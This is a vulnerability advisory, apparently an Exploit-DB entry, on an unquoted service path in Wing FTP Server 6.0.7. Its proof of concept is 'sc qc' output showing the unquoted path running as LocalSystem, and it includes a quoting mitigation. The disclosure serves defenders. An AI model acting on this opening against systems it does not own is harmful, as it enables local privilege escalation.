Wing FTP Server 6.0.7 - Unquoted Service Path

vendor:

Wing FTP Server

by:

Nawaf Alkeraithe

7.8

CVSS

HIGH

Unquoted Service Path

426

CWE

Product Name: Wing FTP Server

Affected Version From: 6.0.7

Affected Version To: 6.0.7

Patch Exists: NO

Related CWE: N/A

CPE: a:wftpserver:wing_ftp_server:6.0.7

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 10

2019

Wing FTP Server 6.0.7 – Unquoted Service Path

Wing FTP Server 6.0.7 is vulnerable to an unquoted service path vulnerability. This vulnerability allows an attacker to gain elevated privileges on the system by exploiting the unquoted service path. The PoC shows that the service path is not quoted, which allows an attacker to inject malicious code into the service path.

Mitigation:

Ensure that all service paths are properly quoted to prevent malicious code injection.

Source

Exploit-DB raw data:

# Exploit Title: Wing FTP Server 6.0.7 - Unquoted Service Path
# Date: 2019-12-30
# Exploit Author: Nawaf Alkeraithe
# Vendor Homepage: https://www.wftpserver.com/
# Version: 6.0.7
# Tested on: Windows 10
# CVE : N/A

# PoC:

C:\Users\user>sc qc "Wing FTP Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Wing FTP Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wing FTP
Server\WFTPServer.exe service
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wing FTP Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem